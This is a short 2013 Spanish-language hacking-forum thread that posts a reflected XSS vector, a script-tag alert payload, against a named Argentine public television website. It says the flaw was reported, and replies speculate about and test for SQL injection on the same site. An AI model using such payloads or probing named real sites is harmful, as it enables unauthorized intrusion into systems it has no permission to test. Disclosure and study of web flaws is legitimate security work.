XSS Tv Publica argentina

  • 2 Respuestas
  • 2172 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado trackerkey

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
  • trackerkey
    • Ver Perfil

XSS Tv Publica argentina

  • en: Enero 30, 2013, 03:30:58 pm


Web: www.tvpublica.com.ar/
Vector: "><script>alert(/trackerkey - Underc0de/)</script>
Autor: Trackerkey
Reportado: SI
« Última modificación: Enero 10, 2015, 12:52:06 pm por Expermicid »

Desconectado Alex

  • *
  • Moderador Global
  • Mensajes: 859
  • Actividad:
    16.67%
  • Country: 00
  • Reputación 5
    • Ver Perfil
    • MI github
    • Email

Re:XSS Tv Publica argentina

  • en: Enero 30, 2013, 03:44:18 pm
si tengo mis sospechas de que también hay sqli, a pesar de que no se muestre el error pero asumo que es porque no tienen mysql_error()

saludos!

Desconectado trackerkey

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
  • trackerkey
    • Ver Perfil

Re:XSS Tv Publica argentina

  • en: Enero 31, 2013, 01:32:39 am
si tengo mis sospechas de que también hay sqli, a pesar de que no se muestre el error pero asumo que es porque no tienen mysql_error()

saludos!

Probe si era vulnerable sqli pero al parecer no,porlomenos yo no pude

Saludos